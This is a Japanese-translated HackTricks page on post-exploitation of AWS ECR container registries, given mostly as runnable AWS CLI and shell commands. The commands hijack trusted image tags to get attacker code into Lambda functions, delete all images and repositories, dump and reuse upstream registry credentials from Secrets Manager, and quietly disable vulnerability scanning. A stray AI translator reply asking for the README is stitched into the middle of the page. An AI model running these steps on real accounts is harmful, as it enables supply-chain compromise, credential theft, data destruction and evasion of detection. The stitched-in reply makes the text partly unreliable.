AWS - ECR Post Exploitation

Tip

学んで実践する AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
学んで実践する GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
学んで実践する Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks をサポートする

subscription plans を確認してください!

参加する 💬 Discord group または telegram group に参加するか、Twitter 🐦 @hacktricks_live をフォローしてください。

Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

ECR

詳細は以下を参照してください

AWS - ECR Enum

# Docker login into ecr
## For public repo (always use us-east-1)
aws ecr-public get-login-password --region us-east-1 | docker login --username AWS --password-stdin public.ecr.aws/<random-id>
## For private repo
aws ecr get-login-password --profile <profile_name> --region <region> | docker login --username AWS --password-stdin <account_id>.dkr.ecr.<region>.amazonaws.com
## If you need to acces an image from a repo if a different account, in <account_id> set the account number of the other account

# Download
docker pull <account_id>.dkr.ecr.<region>.amazonaws.com/<repo_name>:latest
## If you still have the error "Requested image not found"
## It might be because the tag "latest" doesn't exit
## Get valid tags with:
TOKEN=$(aws --profile <profile> ecr get-authorization-token --output text --query 'authorizationData[].authorizationToken')
curl -i -H "Authorization: Basic $TOKEN" https://<account_id>.dkr.ecr.<region>.amazonaws.com/v2/<img_name>/tags/list

# Inspect the image
docker inspect sha256:079aee8a89950717cdccd15b8f17c80e9bc4421a855fcdc120e1c534e4c102e0
docker inspect <account id>.dkr.ecr.<region>.amazonaws.com/<image>:<tag> # Inspect the image indicating the URL

# Upload (example uploading purplepanda with tag latest)
docker tag purplepanda:latest <account_id>.dkr.ecr.<region>.amazonaws.com/purplepanda:latest
docker push <account_id>.dkr.ecr.<region>.amazonaws.com/purplepanda:latest

# Downloading without Docker
# List digests
aws ecr batch-get-image --repository-name level2 \
--registry-id 653711331788 \
--image-ids imageTag=latest | jq '.images[].imageManifest | fromjson'

## Download a digest
aws ecr get-download-url-for-layer \
--repository-name level2 \
--registry-id 653711331788 \
--layer-digest "sha256:edfaad38ac10904ee76c81e343abf88f22e6cfc7413ab5a8e4aeffc6a7d9087a"

イメージをダウンロードした後は、機密情報が含まれていないか確認してください：

Docker Forensics - HackTricks

`ecr:PutImage` を使って信頼されたタグを上書きする（Tag Hijacking / Supply Chain）

利用者がタグ（例えば stable, prod, latest）でデプロイし、タグが変更可能な場合、ecr:PutImage を使ってそのタグにイメージのマニフェストをアップロードし、信頼されたタグの指し先を攻撃者管理のコンテンツに変更することができます。

一般的な手法の1つは、既に攻撃者が管理するタグ（またはダイジェスト）のマニフェストをコピーして、それで信頼されたタグを上書きすることです。

REGION=us-east-1
REPO="<repo_name>"
SRC_TAG="backdoor"   # attacker-controlled tag already present in the repository
DST_TAG="stable"     # trusted tag used by downstream systems

# 1) Fetch the manifest behind the attacker tag
MANIFEST="$(aws ecr batch-get-image \
--region "$REGION" \
--repository-name "$REPO" \
--image-ids imageTag="$SRC_TAG" \
--query 'images[0].imageManifest' \
--output text)"

# 2) Overwrite the trusted tag with that manifest
aws ecr put-image \
--region "$REGION" \
--repository-name "$REPO" \
--image-tag "$DST_TAG" \
--image-manifest "$MANIFEST"

# 3) Verify both tags now point to the same digest
aws ecr describe-images --region "$REGION" --repository-name "$REPO" --image-ids imageTag="$DST_TAG" --query 'imageDetails[0].imageDigest' --output text
aws ecr describe-images --region "$REGION" --repository-name "$REPO" --image-ids imageTag="$SRC_TAG" --query 'imageDetails[0].imageDigest' --output text

Impact: .../$REPO:$DST_TAG をプルする任意のワークロードは、IaC、Kubernetes マニフェスト、またはタスク定義を一切変更することなく攻撃者が選択したコンテンツを受け取ります。

Downstream Consumer Example: タグ更新で自動更新される Lambda コンテナイメージの例

Lambda 関数が コンテナイメージ (PackageType=Image) としてデプロイされ、digest の代わりに ECR tag（例: :stable, :prod）を使用している場合、タグを書き換えることで関数が更新されたときに、サプライチェーンの改ざんが Lambda 実行ロール内でのコード実行 に変わる可能性があります。

この状況を列挙する方法：

REGION=us-east-1

# 1) Find image-based Lambda functions and their ImageUri
aws lambda list-functions --region "$REGION" \
--query "Functions[?PackageType=='Image'].[FunctionName]" --output text |
tr '\t' '\n' | while read -r fn; do
img="$(aws lambda get-function --region "$REGION" --function-name "$fn" --query 'Code.ImageUri' --output text 2>/dev/null || true)"
[ -n "$img" ] && printf '%s\t%s\n' "$fn" "$img"
done

# 2) Check whether a function references a mutable tag (contains ":<tag>")
# Prefer digest pinning (contains "@sha256:") in well-hardened deployments.

How refresh often happens:

CI/CD や GitOps が定期的に lambda:UpdateFunctionCode を呼び出して（同じ ImageUri であっても）Lambda にタグを再解決させる。
イベント駆動の自動化が ECR イメージイベント（push／タグ更新）を監視し、リフレッシュ用の Lambda／自動化を起動する。

もし trusted tag を上書きでき、かつリフレッシュ機構が存在するなら、次回の関数呼び出しで攻撃者制御のコードが実行され、環境変数の読み取り、ネットワークリソースへのアクセス、および Lambda ロールを使った AWS API の呼び出し（例えば secretsmanager:GetSecretValue）が可能になる。

`ecr:PutLifecyclePolicy` | `ecr:DeleteRepository` | `ecr-public:DeleteRepository` | `ecr:BatchDeleteImage` | `ecr-public:BatchDeleteImage`

これらの権限のいずれかを持つ攻撃者は、lifecycle policy を作成または変更してリポジトリ内のすべてのイメージを削除し、その後 ECR リポジトリ全体を削除することができる。これにより、リポジトリに保存されているすべてのコンテナイメージが失われる。

# Create a JSON file with the malicious lifecycle policy
echo '{
"rules": [
{
"rulePriority": 1,
"description": "Delete all images",
"selection": {
"tagStatus": "any",
"countType": "imageCountMoreThan",
"countNumber": 0
},
"action": {
"type": "expire"
}
}
]
}' > malicious_policy.json

# Apply the malicious lifecycle policy to the ECR repository
aws ecr put-lifecycle-policy --repository-name your-ecr-repo-name --lifecycle-policy-text file://malicious_policy.json

# Delete the ECR repository
aws ecr delete-repository --repository-name your-ecr-repo-name --force

# Delete the ECR public repository
aws ecr-public delete-repository --repository-name your-ecr-repo-name --force

# Delete multiple images from the ECR repository
aws ecr batch-delete-image --repository-name your-ecr-repo-name --image-ids imageTag=latest imageTag=v1.0.0

# Delete multiple images from the ECR public repository
aws ecr-public batch-delete-image --repository-name your-ecr-repo-name --image-ids imageTag=latest imageTag=v1.0.0

ECR Pull‑Through Cache (PTC) から上流レジストリの認証情報を抽出する

ECR Pull‑Through Cache が認証済みの上流レジストリ（Docker Hub、GHCR、ACR など）に対して設定されている場合、上流の認証情報は AWS Secrets Manager に予測可能な名前プレフィックス: ecr-pullthroughcache/ で保存されます。オペレーターが ECR 管理者に Secrets Manager の広範な読み取りアクセスを付与することがあり、これにより認証情報を外部へ持ち出して AWS 外で再利用できるようになります。

要件

secretsmanager:ListSecrets
secretsmanager:GetSecretValue

候補となる PTC シークレットを列挙する

aws secretsmanager list-secrets \
--query "SecretList[?starts_with(Name, 'ecr-pullthroughcache/')].Name" \
--output text

発見された secrets を Dump し、common fields を parse する

for s in $(aws secretsmanager list-secrets \
--query "SecretList[?starts_with(Name, 'ecr-pullthroughcache/')].ARN" --output text); do
aws secretsmanager get-secret-value --secret-id "$s" \
--query SecretString --output text | tee /tmp/ptc_secret.json
jq -r '.username? // .user? // empty' /tmp/ptc_secret.json || true
jq -r '.password? // .token? // empty' /tmp/ptc_secret.json || true
done

任意: upstream（読み取り専用ログイン）に対して leaked creds を検証する

echo "$DOCKERHUB_PASSWORD" | docker login --username "$DOCKERHUB_USERNAME" --password-stdin registry-1.docker.io

影響

これらの Secrets Manager エントリを読み取ると、再利用可能な上流レジストリの資格情報（username/password または token）を取得できます。これらは上流の権限に応じて、AWS の外部で private images を pull したり、追加のリポジトリへアクセスするために悪用可能です。

Registry-level stealth: disable or downgrade scanning via `ecr:PutRegistryScanningConfiguration`

registry-level ECR の権限を持つ攻撃者は、registry scanning configuration を scan-on-push ルールなしで BASIC に設定することで、すべてのリポジトリに対する自動脆弱性スキャンを密かに減らしたり無効化したりできます。これにより、新しい image pushes が自動でスキャンされなくなり、脆弱または悪意のあるイメージが隠されます。

要件

ecr:PutRegistryScanningConfiguration
ecr:GetRegistryScanningConfiguration
ecr:PutImageScanningConfiguration (オプション、リポジトリ単位)
ecr:DescribeImages, ecr:DescribeImageScanFindings (検証)

レジストリ全体を手動にダウングレード（自動スキャンなし）

REGION=us-east-1
# Read current config (save to restore later)
aws ecr get-registry-scanning-configuration --region "$REGION"

# Set BASIC scanning with no rules (results in MANUAL scanning only)
aws ecr put-registry-scanning-configuration \
--region "$REGION" \
--scan-type BASIC \
--rules '[]'

repo と image でテスト

acct=$(aws sts get-caller-identity --query Account --output text)
repo=ht-scan-stealth
aws ecr create-repository --region "$REGION" --repository-name "$repo" >/dev/null 2>&1 || true
aws ecr get-login-password --region "$REGION" | docker login --username AWS --password-stdin ${acct}.dkr.ecr.${REGION}.amazonaws.com
printf 'FROM alpine:3.19\nRUN echo STEALTH > /etc/marker\n' > Dockerfile
docker build -t ${acct}.dkr.ecr.${REGION}.amazonaws.com/${repo}:test .
docker push ${acct}.dkr.ecr.${REGION}.amazonaws.com/${repo}:test

# Verify no scan ran automatically
aws ecr describe-images --region "$REGION" --repository-name "$repo" --image-ids imageTag=test --query 'imageDetails[0].imageScanStatus'
# Optional: will error with ScanNotFoundException if no scan exists
aws ecr describe-image-scan-findings --region "$REGION" --repository-name "$repo" --image-id imageTag=test || true

I don’t have access to your repository. Please paste the contents of src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation/README.md here (or the parts you want translated), and I’ll translate the English text to Japanese while preserving all markdown, tags, links, paths, and code.

# Disable scan-on-push for a specific repository
aws ecr put-image-scanning-configuration \
--region "$REGION" \
--repository-name "$repo" \
--image-scanning-configuration scanOnPush=false

影響

レジストリ全体への新しいイメージのプッシュは自動でスキャンされず、脆弱または悪意あるコンテンツの可視性が低下し、手動スキャンが実行されるまで検出が遅延します。

レジストリ全体のスキャンエンジンを `ecr:PutAccountSetting` でダウングレード (AWS_NATIVE -> CLAIR)

デフォルトの AWS_NATIVE からレガシーの CLAIR エンジンに BASIC スキャンエンジンを切り替えることで、レジストリ全体の脆弱性検出の品質を低下させます。これによりスキャンが無効化されるわけではありませんが、検出結果やカバレッジが大きく変わる可能性があります。ルールを設定していない BASIC のレジストリスキャン設定と組み合わせると、スキャンを手動のみの状態にできます。

要件

ecr:PutAccountSetting, ecr:GetAccountSetting
(オプション) ecr:PutRegistryScanningConfiguration, ecr:GetRegistryScanningConfiguration

影響

レジストリ設定 BASIC_SCAN_TYPE_VERSION が CLAIR に設定されるため、その後の BASIC スキャンはダウングレードされたエンジンで実行されます。CloudTrail は PutAccountSetting API コールを記録します。

手順

REGION=us-east-1

# 1) Read current value so you can restore it later
aws ecr get-account-setting --region $REGION --name BASIC_SCAN_TYPE_VERSION || true

# 2) Downgrade BASIC scan engine registry‑wide to CLAIR
aws ecr put-account-setting --region $REGION --name BASIC_SCAN_TYPE_VERSION --value CLAIR

# 3) Verify the setting
aws ecr get-account-setting --region $REGION --name BASIC_SCAN_TYPE_VERSION

# 4) (Optional stealth) switch registry scanning to BASIC with no rules (manual‑only scans)
aws ecr put-registry-scanning-configuration --region $REGION --scan-type BASIC --rules '[]' || true

# 5) Restore to AWS_NATIVE when finished to avoid side effects
aws ecr put-account-setting --region $REGION --name BASIC_SCAN_TYPE_VERSION --value AWS_NATIVE

ECR イメージの脆弱性をスキャンする

#!/bin/bash

# This script pulls all images from ECR and runs snyk on them showing vulnerabilities for all images

region=<region>
profile=<aws_profile>

registryId=$(aws ecr describe-registry --region $region --profile $profile --output json | jq -r '.registryId')

# Configure docker creds
aws ecr get-login-password --region $region --profile $profile | docker login --username AWS --password-stdin $registryId.dkr.ecr.$region.amazonaws.com

while read -r repo; do
echo "Working on repository $repo"
digest=$(aws ecr describe-images --repository-name $repo --image-ids imageTag=latest --region $region --profile $profile --output json | jq -r '.imageDetails[] | .imageDigest')
if [ -z "$digest" ]
then
echo "No images! Empty repository"
continue
fi
url=$registryId.dkr.ecr.$region.amazonaws.com/$repo@$digest
echo "Pulling $url"
docker pull $url
echo "Scanning $url"
snyk container test $url --json-file-output=./snyk/$repo.json --severity-threshold=high
# trivy image -f json -o ./trivy/$repo.json --severity HIGH,CRITICAL $url
# echo "Removing image $url"
# docker image rm $url
done < <(aws ecr describe-repositories --region $region --profile $profile --output json | jq -r '.repositories[] | .repositoryName')

Tip

学んで実践する AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
学んで実践する GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
学んで実践する Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks をサポートする

subscription plans を確認してください!

参加する 💬 Discord group または telegram group に参加するか、Twitter 🐦 @hacktricks_live をフォローしてください。

Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.